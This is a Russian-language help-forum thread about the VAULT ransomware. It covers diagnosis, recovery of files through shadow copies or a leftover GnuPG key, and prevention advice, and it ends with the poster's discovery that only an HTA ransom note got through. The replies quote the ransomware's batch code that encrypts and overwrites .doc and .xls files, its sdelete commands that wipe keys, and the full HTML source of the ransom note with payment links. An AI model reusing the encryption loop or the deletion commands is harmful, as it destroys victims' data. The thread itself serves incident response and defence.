шифровальщик vault

Trunk

Случайный прохожий
Привет! Помогите с диагностикой ПК, есть комп с windows 7 и в нем появились подозрительные файлы vault.key и confirmation.key. Есть подозрения на инфицирование шифровальщиком vault. В системе установлен kaspersky endpoint security 10. Запустил полную проверку но пока ничего не найдено..
 
1. Максимально изолируйте PC от остальной сети, выдерните провод LAN
2. Скачайте CureIT или DrWeb Live DVD
https://free.drweb.ru/aid_admin/

Можно прогнать касперским Kaspersky Rescue DVD
Загрузитесь с этих Live DVD проверьте систему.

Посмотрите вот эти утилиты для борьбы с вирусами http://support.kaspersky.ru/viruses/utility
Возможно что то удастся расшифровать
 
Если вам необходимо восстановить документы зашифрованные VAULT, выполните следующие действия:

1. проверьте наличие теневых копий на дисках, если есть чистые теневые копии, восстановить документы можно без расшифровки.
Используйте для работы с теневыми копиями ShadowExplorer

если теневые копии отсутствуют, возможно были отключены шифратором, восстановите (на будущее) через настройки защиты дисков резервирование
пространства в 5-10% под теневые копии.

2. если теневые и архивные копии отсутствуют, вы можете попытаться самостоятельно выполнить расшифровку документов.
для этого необходимо найти файл secring.gpg.
secring.gpg(sec key) здесь нужен не любой, не найденный по дороге домой из сетевого форума, а созданный на вашей машине (как правило в %TEMP%
юзера) в момент запуска процесса шифрования. Хотя вероятность успешного поиска secring.gpg невелика, поскольку шифратор тщательно затирает
данный ключ с помощью утилиты sdelete.exe.
Код:
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\secring.gpg"
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\vaultkey.vlt"
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\confclean.list"
Повторный запуск шифратора с целью получения этого ключа не поможет. ключ будет создан уже с другим отпечатком и ID, и для расшифровки ваших документов
не подойдет. пробуйте искать данный ключ среди удаленных файлов, но обязательно ненулевого размера. ~1Кб.
что делает шифратор с исходными файлами:
Код:
dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
echo %%i>> "%temp%\conf.list"
)
после шифрования к примеру файла 1.doc рядом с ним создается зашифрованный файл 1.doc.gpg, затем зашифрованный 1.doc.gpg перемещается на место исходного_чистого с новым именем 1.doc,
и только затем переименовывается в 1.doc.vault.
т.о. исходный файл не удаляется, а перезаписывается зашифрованным документом с целью невозможности его восстановления.
Добавим, что злоумышленники после завершения шифрования оставляют на диске файлы VAULT.KEY и CONFIRMATION.KEY. Первый содержит экспортированный secring.gpg,
но зашифрованный с помощью pub key злоумышленников, поэтому расшифровать его на нашей стороне невозможно.
В CONFIRMATION.KEY содержится полный список зашифрованных файлов. Оба эти файла оставлены на диске в качестве жеста "доброй, но и злой" воли
с целью "протянуть руку товарищеской, но платной помощи" пострадавшему юзеру.
--------
если sec key найден, вы можете установить GnuPG и GPGShell и проверить возможность расшифровки.

скачайте отсюда и установите GnuPG
+
отсюда можно скачать GPGShell

В GPGShell удобно (из контекстного меню) выполнять различные действия над файлами и ключами.
+
После установки в каталоге так же можно найти подробный мануал (gpg.man) по консольным командам в GnuPG.
-----------

В GPGShell удобно (из контекстного меню) выполнять различные действия над файлами и ключами.
+
После установки в каталоге так же можно найти подробный мануал (gpg.man) по консольным командам в GnuPG.
-----------

как можно избежать встречи с VAULT?
1. будьте предельно внимательны при работе с почтой.
если вложенный в сообщение или добавленный по ссылке архив содержит исполняемые файлы *.exe, *.com, *.pif, *.js, *.cmd, *.scr, *.bat, то такой документ никак не может быть офисным документом.
Значит вас вводят в заблуждение, выдавая черное за белое.
2. настройте самостоятельно или попросите админа настроить политики ограниченного запуска исполняемых программ из вложенных архивов.
например:
Код:
%userprofile%\Local Settings\Temp\_tc\*.js
%userprofile%\Appdata\Local\Temp\_tc\*.js
3. Пробуйте с помощью HIPS запретить запись в файл %TEMP%\pubring.gpg.
в любом случае, в данной модификации энкодера (если он использует GnuPG) после скачивания и запуска утилита gpg.exe (которая может быть переименована и упакована как угодно) вначале будет создавать ключевую
пару pubring.gpg/secring.gpg, а затем уже - шифровать ваши данные с помощью созданных ключей.

4. Если предварительно положить (и защитить от изменения) известный вам ключ pubring.gpg, то в этом случае
шифрование состоится, но известным ключом. Или не состоится. отсюда
 
Спасибо! Но тут вопрос в другом, вроде бы симптомы есть (*.key файлы) но еще ничего не зашифровано, как удалить этот вредонос???

- -Подумал и добавил - -

Фуххх. Пронесло, короче разобрались что произошло. Никакой заразы не было. А те файлики которые были - липа. Вредонос пытался попасть в нашу сетку через email рассылки (благо у нас пара - тройка cisco iron port c100v с sophos антивирусным движком). Вот как раз они то и уберегли от шифровальщика - вредоносный код был вырезан из тела письма. А ошметки от вируса пропустил. В итоге у пользователя был
только hta файлик с картинкой от вымогателей и все.
Исходный код ниже
Код:
<html><head><hta:application BORDER = "none" CAPTION = "No" CONTEXTMENU = "Yes" INNERBORDER = "No" MAXIMIZEBUTTON = "No" MINIMIZEBUTTON = "No" NAVIGABLE = "No" SCROLL = "No" SCROLLFLAT = "No" SELECTION = "Yes" SHOWINTASKBAR = "No" SINGLEINSTANCE = "Yes" SYSMENU = "No"/><style>body{cursor:default;background-color:#E7E7E7;margin:0;font-family:"HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;text-align:center}.vstyle{margin:10px;height:520px;width:1100px}.sc{margin:10px 150px;font-size:30px;width:900px;color:#3CEE3C;padding:20px;background-color:#7a7a7a;}.briefly{position:absolute;left:50px;width:480px}.detailed{display:inline-block;margin-left:530px;width:660px}.bti{background-color:#DFDFDF;color:#555;font-size:28px;padding:10px}hr{width:90%}.sced{margin-top:15px;text-align:center;font-size:27px;height:220px;padding:20px;background-color:#6a6a6a;line-height:1.5;color:#EAEAEA;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}form{display:inline}.dbutt{margin-left:2px;font-size:16px;font-weight:500;border:none;background-color:#9f9f9f;color:#EEE;cursor:pointer}.footer{text-align:left;position:relative;width:600px;margin:2px 2px 2px 40px;height:16px;font-size:15px;background-color:#CFCFCF;color:#444;padding:6px}.fnl{font-size:0.6em}</style><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><title>Block Notification</title><script language="vbscript">
sub Window_Onload
window.resizeTo 1280,725
screenWidth = Document.ParentWindow.Screen.AvailWidth
screenHeight = Document.ParentWindow.Screen.AvailHeight
posLeft = (screenWidth - 1280) / 2
posTop = (screenHeight - 725) / 2
window.moveTo posLeft, posTop
end sub
</script></head><body scroll="no"><div class="vstyle"><div class="sc"><font color="#FF6666">ВНИМАНИЕ!<br>Ваш компьютер был заблокирован<br>Все Ваши документы и медиафайлы были <b>зашифрованы</b></font></div><div class="sc" style="font-size:20px;width:800px;margin-left:200px;color:#EAEAEA;">Для их восстановления необходимо <b>купить</b> Ваш уникальный дешифратор</div><br><div class="briefly"><div class="bti"><b>Кратко:</b></div><div class="sced">Необходимо произвести 5 шагов:<hr>1. Найдите VАULТ.KЕY<br>2. Перейдите в Ваш кабинет<br>3. Получите <b>ГАРАНТИИ</b><br>4. Приобретите ключ<br>5. Восстановите файлы</div></div><div class="detailed"><div class="bti"><b>Детально:</b></div><div class="sced">Перейдите в клиент-панель по <b>ссылке</b>:<div class="bti" style="margin:5px 8%;padding:0px;cursor:text;"><a href="http://torscreen.org" style="color:#555;text-decoration:none">http://torscreen.org</a></div><center><b style="font-weight:400;font-size:0.6em">Авторизируйтесь > Получите гарантии > Оплатите > Восстановитесь</b></center><hr style="margin:10px 0 10px 0"><form action="http://bit.ly/29dKy1h?vlt"><input class="dbutt" type="submit" value="Что произошло?" style="font-weight:600;height:2em"></form>  <form action="http://bit.ly/29dKui4?vlt"><input class="dbutt" type="submit" value="Дополнительные ссылки" style="font-weight:400;height:2em"></form></div>
<div class="footer">Инфо 1: Никто, кроме нас не сможет восстановить Ваш компьютер.</div><div class="footer">Инфо 2: Для восстановления необходим <u>только</u> <b>VАULТ.KЕY</b>. Сделайте копию!</div>
<div class="footer">Инфо 3: Полиция/Антивирусы не восстановят Ваши файлы</div>
<div class="footer" style="border:2px dashed #8e8e8e;"><u>Есть сложности</u>? Пишите на почту <b>vault.decrypt@gmail.com</b></div></div>
</body></html>

image_64.jpg
Короче мораль - используйте продвинутые антиспам фильтры!
Все.
 
Назад
Верх